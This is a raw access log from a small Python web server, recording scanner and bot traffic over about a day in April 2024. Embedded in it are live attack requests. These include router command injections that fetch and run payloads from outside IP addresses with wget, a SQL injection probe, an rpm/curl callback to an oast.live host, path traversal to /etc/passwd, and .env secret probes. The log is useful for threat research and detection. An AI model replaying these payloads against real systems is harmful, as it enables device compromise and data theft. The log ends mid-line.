"GET / HTTP/1.1" 200 - 107.170.238.41 - - [08/Apr/2024 03:31:20] code 404, message File not found 107.170.238.41 - - [08/Apr/2024 03:31:20] "GET /manager/text/list HTTP/1.1" 404 - 87.121.69.52 - - [08/Apr/2024 03:44:40] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [08/Apr/2024 03:44:40] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [08/Apr/2024 03:46:00] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 03:46:00] "GET /dashboardUser HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 04:05:34] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 04:05:34] "GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 04:17:42] code 501, message Unsupported method ('POST') 185.196.9.61 - - [08/Apr/2024 04:17:42] "POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1" 501 - 185.196.9.61 - - [08/Apr/2024 04:17:45] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 04:17:45] "GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1" 404 - 146.19.24.28 - - [08/Apr/2024 04:25:21] "GET / HTTP/1.1" 200 - 35.202.9.133 - - [08/Apr/2024 04:58:08] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [08/Apr/2024 05:32:38] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 05:32:38] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.35', 36396) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.35 - - [08/Apr/2024 05:43:53] "GET / HTTP/1.1" 200 - 167.94.138.35 - - [08/Apr/2024 05:43:57] "GET / HTTP/1.1" 200 - 167.94.138.35 - - [08/Apr/2024 05:43:57] code 505, message Invalid HTTP version (2.0) 167.94.138.35 - - [08/Apr/2024 05:43:57] "PRI * HTTP/2.0" 505 - 167.94.138.35 - - [08/Apr/2024 05:43:58] code 404, message File not found 167.94.138.35 - - [08/Apr/2024 05:43:58] "GET /favicon.ico HTTP/1.1" 404 - 34.78.6.216 - - [08/Apr/2024 06:27:54] "GET / HTTP/1.1" 200 - 91.134.147.249 - - [08/Apr/2024 06:43:22] code 404, message File not found 91.134.147.249 - - [08/Apr/2024 06:43:22] "GET /.env HTTP/1.1" 404 - 91.134.147.249 - - [08/Apr/2024 06:43:22] code 501, message Unsupported method ('POST') 91.134.147.249 - - [08/Apr/2024 06:43:22] "POST / HTTP/1.1" 501 - 202.26.144.61 - - [08/Apr/2024 07:03:12] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [08/Apr/2024 07:11:35] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [08/Apr/2024 07:49:28] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 07:49:28] "GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 07:49:29] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 07:49:29] "GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1" 404 - 185.242.226.80 - - [08/Apr/2024 08:12:32] "GET / HTTP/1.1" 200 - 206.189.153.193 - - [08/Apr/2024 08:15:33] code 404, message File not found 206.189.153.193 - - [08/Apr/2024 08:15:33] "GET /.env HTTP/1.1" 404 - 206.189.153.193 - - [08/Apr/2024 08:15:33] code 501, message Unsupported method ('POST') 206.189.153.193 - - [08/Apr/2024 08:15:33] "POST / HTTP/1.1" 501 - 109.205.213.198 - - [08/Apr/2024 08:37:46] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [08/Apr/2024 08:41:42] code 400, message Bad request version ('À\\x13À') 185.196.9.61 - - [08/Apr/2024 08:41:42] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x03BòÏ$[<\x10!\x9c\x1eu\x1f\x04æ\x94n\x1f²Ê¹=Dn\x7füh ^¬í*Á }W\x86Ro»Þ"²PûZ\x88UîOøCªvÞuê\x1bo\x89\x01Ö\\À\x8d6\x00&̨̩À+À/À,À0À\x09À\x13À" 400 - 185.196.9.61 - - [08/Apr/2024 08:42:02] code 400, message Bad request version ('À\\x13À') 185.196.9.61 - - [08/Apr/2024 08:42:02] "\x16\x03\x01\x00ò\x01\x00\x00î\x03\x034× \x19zíòù\x11mtøV5\x94ÊÞ\x8e=s9p\x89ÁÐ\x16äË\x05ë±\x9c DG\x06«\x075çά§þ\x1dcÎ06R!Ò\x94'Ø\x07Í\x06±r\x974T(»\x00&̨̩À+À/À,À0À\x09À\x13À" 400 - 180.92.229.122 - - [08/Apr/2024 08:58:38] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [08/Apr/2024 09:07:57] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 09:07:57] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.121.69.52 - - [08/Apr/2024 09:30:23] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [08/Apr/2024 09:30:23] "CONNECT google.com:443 HTTP/1.1" 501 - 198.235.24.153 - - [08/Apr/2024 09:33:49] code 400, message Bad request version ('À\\x13À') 198.235.24.153 - - [08/Apr/2024 09:33:49] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03Òæ1>ÐøXJp¤?åû\x08²`|5¹±¦S\x03/X\x80\x1eÃ\x0f«\x14¨ ÿ\x1d±ñÇznl_×A6\x93Xó\x1f¡ï\x13еìz¯6\x1eY̼iâs\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.153 - - [08/Apr/2024 09:33:49] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.153 - - [08/Apr/2024 09:33:49] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x031¼2xá\x9aßj%N7¼¸\x86\x8eÓ»­6:S(]Ö\x89BË^ë\x8d N\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 45.227.254.8 - - [08/Apr/2024 10:04:18] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 45.227.254.8 - - [08/Apr/2024 10:04:18] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 80.66.77.235 - - [08/Apr/2024 10:09:42] "GET / HTTP/1.1" 200 - 159.65.68.1 - - [08/Apr/2024 10:44:21] code 400, message Bad request version ('À\\x14À') 159.65.68.1 - - [08/Apr/2024 10:44:21] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ý\x92¹]öϼÑï44\x9b\x93\x0e\x17[\x01\x11æ¼ T\x0cpX;\x1cSþ\x18â\x16\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 159.65.68.1 - - [08/Apr/2024 10:44:22] code 400, message Bad request version ('7^Q~\\x9f') 159.65.68.1 - - [08/Apr/2024 10:44:22] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x039\x1fæ­ï¾Bô\x09\x9c\x03éI[\x8ecÐe7L¨\x94\x7f\x1f7^Q~\x9f" 400 - 159.65.68.1 - - [08/Apr/2024 10:44:22] "GET / HTTP/1.1" 200 - 159.65.68.1 - - [08/Apr/2024 10:44:22] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:22] "GET /form.html HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:22] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:22] "GET /upl.php HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:23] code 400, message Bad request version ('À\\x14À') 159.65.68.1 - - [08/Apr/2024 10:44:23] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03GN1MØ\x15ºÁ!cB\x122¸I¬m\x8a-+-÷lâ«áÓ\x09\x1düêb\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 159.65.68.1 - - [08/Apr/2024 10:44:23] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:23] "GET /geoip/ HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:23] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:23] "GET /favicon.ico HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:24] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:24] "GET /1.php HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:24] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:24] "GET /bundle.js HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:24] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:24] "GET /files/ HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:25] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:25] "GET /systembc/password.php HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:25] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:25] "GET /password.php HTTP/1.1" 404 - 159.65.68.1 - - [08/Apr/2024 10:44:25] code 404, message File not found 159.65.68.1 - - [08/Apr/2024 10:44:25] "GET /info.php HTTP/1.1" 404 - 74.91.126.185 - - [08/Apr/2024 11:05:56] code 404, message File not found 74.91.126.185 - - [08/Apr/2024 11:05:56] "GET /feed/jolts.rss HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 11:12:32] code 400, message Bad request version ('÷óÃ6ªvfdl¨\\x7f\\x87Ô\\x00\\x00*À+À/\\x00\\x9ę̩̪À') 185.196.9.61 - - [08/Apr/2024 11:12:32] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03L¥\x07÷/\x8d\x9f}@/îÌGc\x08\x09dú\x1e÷óÃ6ªvfdl¨\x7f\x87Ô\x00\x00*À+À/\x00\x9ę̩̪À" 400 - 104.152.52.97 - - [08/Apr/2024 11:17:29] "GET / HTTP/1.0" 200 - 45.125.66.34 - - [08/Apr/2024 11:27:51] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [08/Apr/2024 11:27:51] "CONNECT google.com:443 HTTP/1.1" 501 - 60.191.125.35 - - [08/Apr/2024 11:30:46] code 404, message File not found 60.191.125.35 - - [08/Apr/2024 11:30:46] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 404 - 114.112.124.194 - - [08/Apr/2024 11:39:00] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [08/Apr/2024 11:40:49] "GET / HTTP/1.1" 200 - 5.253.204.236 - - [08/Apr/2024 11:42:00] code 404, message File not found 5.253.204.236 - - [08/Apr/2024 11:42:00] "HEAD /.env HTTP/1.1" 404 - 185.224.128.43 - - [08/Apr/2024 11:46:20] "GET / HTTP/1.1" 200 - 162.216.149.246 - - [08/Apr/2024 11:48:44] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [08/Apr/2024 12:20:51] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 12:20:51] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 45.79.181.223 - - [08/Apr/2024 12:43:56] code 400, message Bad request version ('À\\x14À') 45.79.181.223 - - [08/Apr/2024 12:43:56] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03\x1b\x1b2\x99¼Í.d\x9b\x84Ó\x04bÂc°>8j&\x0eª£ñåØ=Ô\x84@\x9f~\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 148.153.56.86 - - [08/Apr/2024 12:49:42] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:42] "GET /nVTD HTTP/1.1" 404 - 148.153.56.86 - - [08/Apr/2024 12:49:43] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:43] "GET /q1iR HTTP/1.1" 404 - 148.153.56.86 - - [08/Apr/2024 12:49:43] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:43] "GET /aab8 HTTP/1.1" 404 - 148.153.56.86 - - [08/Apr/2024 12:49:43] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:43] "GET /jquery-3.3.1.slim.min.js HTTP/1.1" 404 - 148.153.56.86 - - [08/Apr/2024 12:49:44] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:44] "GET /aab9 HTTP/1.1" 404 - 148.153.56.86 - - [08/Apr/2024 12:49:45] code 404, message File not found 148.153.56.86 - - [08/Apr/2024 12:49:45] "GET /jquery-3.3.2.slim.min.js HTTP/1.1" 404 - 193.106.29.125 - - [08/Apr/2024 13:57:07] "GET / HTTP/1.0" 200 - 36.89.118.113 - - [08/Apr/2024 14:10:03] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [08/Apr/2024 14:37:00] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 14:37:00] "GET /about_state HTTP/1.1" 404 - 185.224.128.34 - - [08/Apr/2024 15:13:04] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 15:13:04] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 205.210.31.199 - - [08/Apr/2024 15:15:26] "GET / HTTP/1.0" 200 - 87.121.69.52 - - [08/Apr/2024 15:19:00] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [08/Apr/2024 15:19:00] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [08/Apr/2024 15:23:24] code 501, message Unsupported method ('PUT') 185.196.9.61 - - [08/Apr/2024 15:23:24] "PUT /SDK/webLanguage HTTP/1.1" 501 - 185.196.9.61 - - [08/Apr/2024 15:27:44] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00£\\x01\\x00\\x00\\x9f\\x03\\x03\\x1aüô\\x15?UmS4:Kå/L*WÀùUóô1Ü\\x9døè\\x0f)ÙMÿü\\x00\\x00*À+À/\\x00\\x9ę̩̪À') 185.196.9.61 - - [08/Apr/2024 15:27:44] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03\x1aüô\x15?UmS4:Kå/L*WÀùUóô1Ü\x9døè\x0f)ÙMÿü\x00\x00*À+À/\x00\x9ę̩̪À" 400 - 185.196.9.61 - - [08/Apr/2024 15:28:47] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 15:28:47] "GET /2dvNUP7LhTIFi9PJDqgxlQUBsWd.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//cnu5g6j332t368874ndgh6jxdisfpzay5.oast.live+-H+'User-Agent%3a+BmTMoJ'")}' HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 16:12:25] code 400, message Bad request version ('æUE}¾\\x00\\x00*À+À/\\x00\\x9ę̩̪À') 185.196.9.61 - - [08/Apr/2024 16:12:25] "\x16\x03\x01\x00£\x01\x00\x00\x9f\x03\x03ñ\x95ó"iyU"Ô \x84EûÖæNõo\x05FÜX\x1c¢\x87§\x1fæUE}¾\x00\x00*À+À/\x00\x9ę̩̪À" 400 - 71.6.232.20 - - [08/Apr/2024 16:20:57] "GET / HTTP/1.1" 200 - 64.62.197.228 - - [08/Apr/2024 17:05:00] "GET / HTTP/1.1" 200 - 64.62.197.241 - - [08/Apr/2024 17:07:16] code 404, message File not found 64.62.197.241 - - [08/Apr/2024 17:07:16] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.236 - - [08/Apr/2024 17:08:07] code 404, message File not found 64.62.197.236 - - [08/Apr/2024 17:08:07] "GET /geoserver/web/ HTTP/1.1" 404 - 80.94.92.60 - - [08/Apr/2024 17:15:59] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [08/Apr/2024 17:37:13] "GET / HTTP/1.1" 200 - 104.131.144.37 - - [08/Apr/2024 18:12:44] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 104.131.144.37 - - [08/Apr/2024 18:12:44] "MGLNDD_194.193.213.117_80" 400 - 118.123.105.85 - - [08/Apr/2024 18:19:55] "GET / HTTP/1.0" 200 - 118.123.105.85 - - [08/Apr/2024 18:19:56] code 404, message File not found 118.123.105.85 - - [08/Apr/2024 18:19:56] "GET /favicon.ico HTTP/1.1" 404 - 118.123.105.85 - - [08/Apr/2024 18:19:57] code 404, message File not found 118.123.105.85 - - [08/Apr/2024 18:19:57] "GET /robots.txt HTTP/1.1" 404 - 118.123.105.85 - - [08/Apr/2024 18:19:57] code 404, message File not found 118.123.105.85 - - [08/Apr/2024 18:19:57] "GET /.well-known/security.txt HTTP/1.1" 404 - 83.97.73.245 - - [08/Apr/2024 18:25:37] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 64.62.197.102 - - [08/Apr/2024 18:27:34] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03\\x86y\\x0fغ¯t_krakyjlùøÜ\\x82}Y2+G¤¦\\x9d/ÌT{õ\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À') 64.62.197.102 - - [08/Apr/2024 18:27:34] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x86y\x0fغ¯t_krakyjlùøÜ\x82}Y2+G¤¦\x9d/ÌT{õ\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 117.205.109.190 - - [08/Apr/2024 18:45:27] "GET / HTTP/1.1" 200 - 117.205.109.190 - - [08/Apr/2024 18:45:27] "GET / HTTP/1.1" 200 - 31.43.232.58 - - [08/Apr/2024 18:53:25] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [08/Apr/2024 18:56:26] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 18:56:26] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 4.229.241.170 - - [08/Apr/2024 19:01:47] code 404, message File not found 4.229.241.170 - - [08/Apr/2024 19:01:47] "GET /.env HTTP/1.1" 404 - 4.229.241.170 - - [08/Apr/2024 19:01:48] code 501, message Unsupported method ('POST') 4.229.241.170 - - [08/Apr/2024 19:01:48] "POST / HTTP/1.1" 501 - 178.62.216.118 - - [08/Apr/2024 19:21:22] code 404, message File not found 178.62.216.118 - - [08/Apr/2024 19:21:22] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 - 178.62.216.118 - - [08/Apr/2024 19:21:22] code 404, message File not found 178.62.216.118 - - [08/Apr/2024 19:21:22] "GET /Pages/log/ HTTP/1.1" 404 - 128.14.209.38 - - [08/Apr/2024 19:24:36] "GET / HTTP/1.1" 200 - 212.33.219.170 - - [08/Apr/2024 19:51:25] "GET / HTTP/1.1" 200 - 35.236.97.32 - - [08/Apr/2024 19:54:40] code 400, message Bad request version ('z\\x8dµH(\\x16\\x8b\\x19ÚÛn.Ö½²') 35.236.97.32 - - [08/Apr/2024 19:54:40] "\x16\x03\x01\x00M\x01\x00\x00I\x03\x03\x96½\x16ìûëª Ìc\x9aBõxÀÃ\x896¤\x97\x8cmÞÔ[üe÷]\x8e\x811 z\x8dµH(\x16\x8b\x19ÚÛn.Ö½²" 400 - 35.236.97.32 - - [08/Apr/2024 19:54:43] code 501, message Unsupported method ('OPTIONS') 35.236.97.32 - - [08/Apr/2024 19:54:43] "OPTIONS / HTTP/1.0" 501 - 83.97.73.245 - - [08/Apr/2024 20:01:18] code 404, message File not found 83.97.73.245 - - [08/Apr/2024 20:01:18] "GET /actuator/gateway/routes HTTP/1.1" 404 - 205.210.31.7 - - [08/Apr/2024 20:31:44] "GET / HTTP/1.1" 200 - 73.183.196.205 - - [08/Apr/2024 20:34:41] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [08/Apr/2024 20:47:24] "GET / HTTP/1.1" 200 - 185.224.128.17 - - [08/Apr/2024 21:21:52] code 501, message Unsupported method ('CONNECT') 185.224.128.17 - - [08/Apr/2024 21:21:52] "CONNECT example.com:80 HTTP/1.1" 501 - 185.224.128.17 - - [08/Apr/2024 21:22:07] code 400, message Bad request syntax ('\\x05\\x01\\x00') 185.224.128.17 - - [08/Apr/2024 21:22:07] "\x05\x01\x00" 400 - 185.224.128.17 - - [08/Apr/2024 21:22:07] code 400, message Bad request syntax ('\\x04\\x01\\x00P\\x00\\x00\\x00\\x01\\x00example.com\\x00') 185.224.128.17 - - [08/Apr/2024 21:22:07] "\x04\x01\x00P\x00\x00\x00\x01\x00example.com\x00" 400 - 45.156.129.2 - - [08/Apr/2024 21:26:06] "GET / HTTP/1.1" 200 - 45.156.129.2 - - [08/Apr/2024 21:26:21] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:26:21] "GET /webfig/ HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:26:37] "GET / HTTP/1.1" 200 - 45.156.129.2 - - [08/Apr/2024 21:26:38] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:26:38] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:26:53] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:26:53] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:09] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:09] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:10] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:10] "GET /admin/ HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:10] "GET / HTTP/1.1" 200 - 45.156.129.2 - - [08/Apr/2024 21:27:11] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:11] "GET /showLogin.cc HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:26] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:26] "GET /static/historypage.js HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:43] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:43] "GET /sugar_version.json HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:27:59] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:27:59] "GET /index.jsp HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:28:18] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:28:18] "GET /identity HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:28:42] "GET / HTTP/1.1" 200 - 45.156.129.2 - - [08/Apr/2024 21:28:43] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:28:43] "GET /solr/ HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:01] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:01] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:02] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:02] "GET /zabbix/favicon.ico HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:19] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:19] "GET /favicon.ico HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:28] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:28] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:40] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:40] "GET /api/session/properties HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:49] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:49] "GET /favicon-32x32.png HTTP/1.1" 404 - 45.156.129.2 - - [08/Apr/2024 21:29:49] code 404, message File not found 45.156.129.2 - - [08/Apr/2024 21:29:49] "GET /favicon.ico HTTP/1.1" 404 - 87.121.69.52 - - [08/Apr/2024 21:40:01] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [08/Apr/2024 21:40:01] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.34 - - [08/Apr/2024 21:49:31] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 21:49:31] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.224.128.43 - - [08/Apr/2024 21:57:37] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [08/Apr/2024 22:00:13] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 22:00:13] "GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1" 404 - 159.203.192.47 - - [08/Apr/2024 22:14:48] "GET / HTTP/1.1" 200 - 80.217.44.132 - - [08/Apr/2024 23:07:20] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [08/Apr/2024 23:43:53] "GET / HTTP/1.1" 200 - 185.180.143.8 - - [09/Apr/2024 00:05:43] "GET / HTTP/1.1" 200 - 185.242.226.99 - - [09/Apr/2024 00:07:01] "GET / HTTP/1.1" 200 - 212.70.149.134 - - [09/Apr/2024 00:18:37] "GET / HTTP/1.0" 200 - 185.224.128.34 - - [09/Apr/2024 00:26:40] code 404, message File not found 185.224.128.34 - - [09/Apr/2024 00:26:40] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 80.94.92.60 - - [09/Apr/2024 00:30:02] code 404, message File not found 80.94.92.60 - - [09/Apr/2024 00:30:02] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3Bcd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.8.244%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 - 185.196.9.61 - - [09/Apr/2024 01:34:58] code 501, message Unsupported method ('POST') 185.196.9.61 - - [09/Apr/2024 01:34:58] "POST /homeaction.php HTTP/1.1" 501 - 74.91.126.185 - - [09/Apr/2024 01:39:05] code 404, message File not found 74.91.126.185 - - [09/Apr/2024 01:39:05] "GET /pub/time.series/overview.txt HTTP/1.1" 404 - 165.154.11.121 - - [09/Apr/2024 01:52:20] code 400, message Bad request version ('\\x00\\x9ę̪\\x003\\x00=\\x00\\x16À') 165.154.11.121 - - [09/Apr/2024 01:52:20] "\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03lDª¬³ÉA¹w\x02É\x8f\x019¥E+\x94ǦD\x9fªÓUn\x9a­Ùe¤é #ÊK\x09ñå{xÝ.t\x0eKüP1¾ô\x93»@&$\x83Ø\x8b@\x12\x03\x069\x06\x004̨̩À/À0À+À,À\x09\x00\x9ę̪\x003\x00=\x00\x16À" 400 - 165.154.11.121 - - [09/Apr/2024 01:52:31] "GET / HTTP/1.1" 200 - 165.154.11.121 - - [09/Apr/2024 01:52:32] code 404, message File not found 165.154.11.121 - - [09/Apr/2024 01:52:32] "GET /favicon.ico HTTP/1.1" 404 - 165.154.11.121 - - [09/Apr/2024 01:52:33] code 404, message File not found 165.154.11.121 - - [09/Apr/2024 01:52:33] "GET /robots.txt 